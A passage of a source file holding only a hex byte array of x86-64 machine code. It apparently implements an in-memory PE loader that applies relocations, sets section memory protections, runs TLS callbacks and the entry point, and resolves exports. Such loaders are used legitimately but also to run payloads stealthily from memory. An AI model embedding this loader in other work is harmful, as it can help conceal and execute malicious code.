1160 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b,
1161 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0x70,
1162 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8b,
1163 0x85, 0x18, 0x05, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x74, 0x3b,
1164 0x48, 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x02, 0x48,
1165 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0x4d, 0x0d,
1166 0x00, 0x00, 0x85, 0xc0, 0x74, 0x1d, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00,
1167 0x00, 0x48, 0x8b, 0x80, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
1168 0x8b, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x37, 0x48,
1169 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x02, 0x48, 0x8b,
1170 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49,
1171 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00,
1172 0xe8, 0xb9, 0xd5, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xe0,
1173 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83, 0x85, 0xe8, 0x04, 0x00,
1174 0x00, 0x08, 0x48, 0x83, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x08, 0xe9, 0xf4,
1175 0xfe, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x14,
1176 0x48, 0x8b, 0x85, 0xd8, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x85, 0xc0,
1177 0x0f, 0x85, 0x6f, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00,
1178 0x00, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00,
1179 0x00, 0x83, 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x70, 0x01,
1180 0x00, 0x00, 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70,
1181 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x04, 0x00, 0x00, 0xe9, 0x45,
1182 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40,
1183 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89,
1184 0x85, 0x28, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x04, 0x00, 0x00,
1185 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0x17,
1186 0xd8, 0xff, 0xff, 0x48, 0x89, 0x85, 0x20, 0x04, 0x00, 0x00, 0x48, 0x83,
1187 0xbd, 0x20, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xf4, 0x00, 0x00, 0x00,
1188 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2,
1189 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x04,
1190 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x0c,
1191 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
1192 0xe0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48,
1193 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xb0, 0x00, 0x00, 0x00, 0x48,
1194 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0,
1195 0x79, 0x3a, 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x00,
1196 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd1,
1197 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1198 0x10, 0x05, 0x00, 0x00, 0xe8, 0x7d, 0xd4, 0xff, 0xff, 0x48, 0x89, 0xc2,
1199 0x48, 0x8b, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x4f,
1200 0x48, 0x8b, 0x85, 0xe8, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b,
1201 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x18, 0x04, 0x00, 0x00,
1202 0x48, 0x8b, 0x85, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x02, 0x48,
1203 0x8b, 0x85, 0x20, 0x04, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
1204 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00,
1205 0x00, 0xe8, 0x2c, 0xd4, 0xff, 0xff, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85,
1206 0xe0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83, 0x85, 0xe8, 0x04,
1207 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0xe0, 0x04, 0x00, 0x00, 0x08, 0xe9,
1208 0x40, 0xff, 0xff, 0xff, 0x90, 0xeb, 0x01, 0x90, 0x48, 0x83, 0x85, 0xd0,
1209 0x04, 0x00, 0x00, 0x20, 0x48, 0x8b, 0x85, 0xd0, 0x04, 0x00, 0x00, 0x8b,
1210 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85, 0xa9, 0xfe, 0xff, 0xff, 0x48, 0x8b,
1211 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b,
1212 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10, 0x04, 0x00, 0x00,
1213 0x48, 0x8b, 0x95, 0x78, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xb0, 0x02,
1214 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba, 0x21, 0x00, 0x00, 0x00, 0x48, 0x89,
1215 0xc7, 0x4c, 0x89, 0xc6, 0x48, 0x89, 0xd1, 0xf3, 0x48, 0xa5, 0x48, 0xc7,
1216 0x85, 0xb8, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x85,
1217 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xd0, 0x48, 0x89, 0xd0, 0x48, 0xc1,
1218 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0x45,
1219 0x58, 0x48, 0x8d, 0x4d, 0x58, 0x48, 0x8d, 0x85, 0xb8, 0x03, 0x00, 0x00,
1220 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30,
1221 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
1222 0x00, 0x30, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00,
1223 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
1224 0x9f, 0x33, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd,
1225 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x5c, 0x0a, 0x00, 0x00, 0x0f,
1226 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xd0, 0x89, 0xd0, 0xc1,
1227 0xe0, 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x48, 0x8b, 0x85,
1228 0xb8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x48, 0x04, 0x00, 0x00, 0x41,
1229 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x46, 0x2b, 0x00, 0x00, 0x48, 0x8b,
1230 0x85, 0x10, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x48, 0x05, 0x00, 0x00, 0x83,
1231 0xf8, 0x01, 0x75, 0x73, 0x48, 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f,
1232 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00, 0x84, 0xc0, 0x75, 0x41, 0x48, 0x8b,
1233 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x50, 0x54, 0x48, 0x8b, 0x45, 0x70,
1234 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
1235 0xc0, 0x2a, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b,
1236 0x50, 0x54, 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00, 0x41, 0x89, 0xd0,
1237 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x9f, 0x2a, 0x00,
1238 0x00, 0xeb, 0x20, 0x48, 0x8b, 0x85, 0x78, 0x04, 0x00, 0x00, 0x8b, 0x48,
1239 0x54, 0x48, 0x8b, 0x55, 0x70, 0x48, 0x8b, 0x85, 0x88, 0x04, 0x00, 0x00,
1240 0x41, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xc1, 0x2a, 0x00, 0x00, 0x48,
1241 0x8b, 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00,
1242 0x00, 0x84, 0xc0, 0x0f, 0x85, 0xbe, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
1243 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
1244 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xa7, 0x31,
1245 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1246 0x00, 0x00, 0x00, 0x0f, 0x88, 0x65, 0x09, 0x00, 0x00, 0x83, 0xbd, 0x58,
1247 0x04, 0x00, 0x00, 0x00, 0x74, 0x08, 0x48, 0xc7, 0x45, 0x70, 0x00, 0x00,
1248 0x00, 0x00, 0x48, 0xc7, 0x45, 0x68, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1249 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x70, 0x48, 0x8b, 0x95,
1250 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24,
1251 0x48, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00,
1252 0x00, 0xc7, 0x44, 0x24, 0x38, 0x02, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55,
1253 0x68, 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00,
1254 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00,
1255 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc2,
1256 0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0xed, 0x30, 0x00, 0x00,
1257 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00,
1258 0x00, 0x0f, 0x88, 0xda, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x68, 0x48,
1259 0x8d, 0x45, 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89,
1260 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89,
1261 0x54, 0x24, 0x20, 0x41, 0xb9, 0x08, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8,
1262 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x76,
1263 0x31, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1264 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x92, 0x08, 0x00, 0x00, 0xc7, 0x85,
1265 0xac, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x10, 0x03, 0x00,
1266 0x00, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04,
1267 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0,
1268 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8,
1269 0x1e, 0x83, 0xe0, 0x01, 0x89, 0x85, 0xd4, 0x03, 0x00, 0x00, 0x48, 0x8b,
1270 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48,
1271 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0,
1272 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x24, 0xc1, 0xe8, 0x1f, 0x89, 0x85,
1273 0xd0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b,
1274 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02,
1275 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40,
1276 0x24, 0xc1, 0xe8, 0x1d, 0x83, 0xe0, 0x01, 0x89, 0x85, 0xcc, 0x03, 0x00,
1277 0x00, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74, 0x18, 0x83, 0xbd,
1278 0xcc, 0x03, 0x00, 0x00, 0x00, 0x74, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1279 0x00, 0x80, 0x00, 0x00, 0x00, 0xe9, 0x06, 0x01, 0x00, 0x00, 0x83, 0xbd,
1280 0xd4, 0x03, 0x00, 0x00, 0x00, 0x74, 0x18, 0x83, 0xbd, 0xcc, 0x03, 0x00,
1281 0x00, 0x00, 0x74, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x20, 0x00,
1282 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xd4, 0x03, 0x00,
1283 0x00, 0x00, 0x74, 0x42, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74,
1284 0x39, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x30, 0x48, 0x8b,
1285 0x85, 0x10, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00, 0x00,
1286 0x84, 0xc0, 0x75, 0x0f, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x08, 0x00,
1287 0x00, 0x00, 0xe9, 0xa9, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1288 0x00, 0x04, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00, 0x83, 0xbd,
1289 0xd4, 0x03, 0x00, 0x00, 0x00, 0x75, 0x1e, 0x83, 0xbd, 0xd0, 0x03, 0x00,
1290 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x74,
1291 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0xeb,
1292 0x73, 0x83, 0xbd, 0xd4, 0x03, 0x00, 0x00, 0x00, 0x74, 0x1e, 0x83, 0xbd,
1293 0xd0, 0x03, 0x00, 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd, 0xcc, 0x03, 0x00,
1294 0x00, 0x00, 0x75, 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00, 0x00, 0x02, 0x00,
1295 0x00, 0x00, 0xeb, 0x4c, 0x83, 0xbd, 0xd4, 0x03, 0x00, 0x00, 0x00, 0x75,
1296 0x1e, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x75, 0x15, 0x83, 0xbd,
1297 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x0c, 0xc7, 0x85, 0xa4, 0x04, 0x00,
1298 0x00, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x25, 0x83, 0xbd, 0xd4, 0x03, 0x00,
1299 0x00, 0x00, 0x75, 0x1c, 0x83, 0xbd, 0xd0, 0x03, 0x00, 0x00, 0x00, 0x74,
1300 0x13, 0x83, 0xbd, 0xcc, 0x03, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xc7, 0x85,
1301 0xa4, 0x04, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0xb8,
1302 0x03, 0x00, 0x00, 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0,
1303 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48,
1304 0x01, 0xc8, 0x8b, 0x40, 0x24, 0x25, 0x00, 0x00, 0x00, 0x04, 0x85, 0xc0,
1305 0x74, 0x0a, 0x81, 0x8d, 0xa4, 0x04, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
1306 0x48, 0x8b, 0x4d, 0x70, 0x4c, 0x8b, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x8b,
1307 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02,
1308 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x4c, 0x01, 0xc0, 0x8b, 0x40,
1309 0x0c, 0x89, 0xc0, 0x48, 0x01, 0xc8, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00,
1310 0x00, 0x0f, 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00, 0x0f, 0xb7, 0xc0, 0x83,
1311 0xe8, 0x01, 0x39, 0x85, 0xac, 0x04, 0x00, 0x00, 0x73, 0x5b, 0x48, 0x8b,
1312 0x95, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xac, 0x04, 0x00, 0x00, 0x83,
1313 0xc0, 0x01, 0x89, 0xc1, 0x48, 0x89, 0xc8, 0x48, 0xc1, 0xe0, 0x02, 0x48,
1314 0x01, 0xc8, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c,
1315 0x41, 0x89, 0xc0, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00, 0x8b, 0x95,
1316 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48,
1317 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x0c,
1318 0x89, 0xc2, 0x4c, 0x89, 0xc0, 0x48, 0x29, 0xd0, 0x48, 0x89, 0x85, 0x90,
1319 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x8d, 0xb8, 0x03, 0x00, 0x00,
1320 0x8b, 0x95, 0xac, 0x04, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0,
1321 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x01, 0xc8, 0x8b,
1322 0x40, 0x10, 0x89, 0xc0, 0x48, 0x89, 0x85, 0x90, 0x00, 0x00, 0x00, 0xc7,
1323 0x85, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x44, 0x8b, 0x85,
1324 0xa4, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48,
1325 0x8d, 0x85, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00,
1326 0x00, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00,
1327 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x45, 0x89, 0xc1, 0x49, 0x89, 0xc8,
1328 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x5e,
1329 0x2e, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1330 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0x7d, 0x05, 0x00, 0x00, 0x83, 0x85,
1331 0xac, 0x04, 0x00, 0x00, 0x01, 0x0f, 0xb7, 0x85, 0xb6, 0x02, 0x00, 0x00,
1332 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xac, 0x04, 0x00, 0x00, 0x0f, 0x82, 0xda,
1333 0xfc, 0xff, 0xff, 0xc7, 0x85, 0x8c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1334 0x00, 0x8b, 0x85, 0xdc, 0x02, 0x00, 0x00, 0x89, 0xc0, 0x48, 0x89, 0x85,
1335 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x90, 0x00, 0x00, 0x00, 0x48,
1336 0x8d, 0x45, 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89,
1337 0x54, 0x24, 0x28, 0x48, 0x8d, 0x95, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x89,
1338 0x54, 0x24, 0x20, 0x41, 0xb9, 0x02, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc8,
1339 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xda,
1340 0x2d, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1341 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xfc, 0x04, 0x00, 0x00, 0x48, 0x8b,
1342 0x85, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00,
1343 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc1, 0xff, 0xff,
1344 0xff, 0xff, 0xe8, 0xde, 0x2e, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00,
1345 0x00, 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x88, 0xcb, 0x04,
1346 0x00, 0x00, 0x8b, 0x85, 0x80, 0x03, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04,
1347 0x00, 0x00, 0x83, 0xbd, 0x3c, 0x04, 0x00, 0x00, 0x00, 0x74, 0x68, 0x8b,
1348 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1349 0x48, 0x89, 0x85, 0x08, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x04,
1350 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x85, 0xc8, 0x04, 0x00,
1351 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x04, 0x00, 0x00, 0x00, 0x74, 0x38, 0xeb,
1352 0x27, 0x48, 0x8b, 0x85, 0xc8, 0x04, 0x00, 0x00, 0x4c, 0x8b, 0x08, 0x48,
1353 0x8b, 0x45, 0x70, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00,
1354 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x48, 0x83, 0x85, 0xc8,
1355 0x04, 0x00, 0x00, 0x08, 0x48, 0x8b, 0x85, 0xc8, 0x04, 0x00, 0x00, 0x48,
1356 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x75, 0xca, 0x48, 0x8b, 0x85, 0x18, 0x05,
1357 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x34, 0x02, 0x00,
1358 0x00, 0x8b, 0x85, 0xd8, 0x02, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45,
1359 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x00, 0x04, 0x00, 0x00, 0x48,
1360 0x8b, 0x45, 0x70, 0x4c, 0x8b, 0x8d, 0x00, 0x04, 0x00, 0x00, 0x41, 0xb8,
1361 0x00, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1362 0x41, 0xff, 0xd1, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6,
1363 0x80, 0x0c, 0x03, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0x39, 0x03, 0x00,
1364 0x00, 0x8b, 0x85, 0x38, 0x03, 0x00, 0x00, 0x89, 0x85, 0x3c, 0x04, 0x00,
1365 0x00, 0x8b, 0x95, 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x48,
1366 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x83, 0xbd, 0x3c,
1367 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8b,
1368 0x85, 0xf8, 0x03, 0x00, 0x00, 0x8b, 0x40, 0x18, 0x89, 0x85, 0xa8, 0x04,
1369 0x00, 0x00, 0x83, 0xbd, 0xa8, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xef,
1370 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x8b, 0x40,
1371 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89,
1372 0x85, 0xf0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03, 0x00, 0x00,
1373 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01, 0xd0,
1374 0x48, 0x89, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x03,
1375 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48,
1376 0x01, 0xd0, 0x48, 0x89, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x8b, 0x85, 0xa8,
1377 0x04, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85,
1378 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48,
1379 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x70, 0x48, 0x01,
1380 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18,
1381 0x05, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x0c, 0x03, 0x00, 0x00, 0x48, 0x8b,
1382 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x87, 0x25, 0x00,
1383 0x00, 0x85, 0xc0, 0x75, 0x45, 0x8b, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x83,
1384 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0xe0,
1385 0x03, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0,
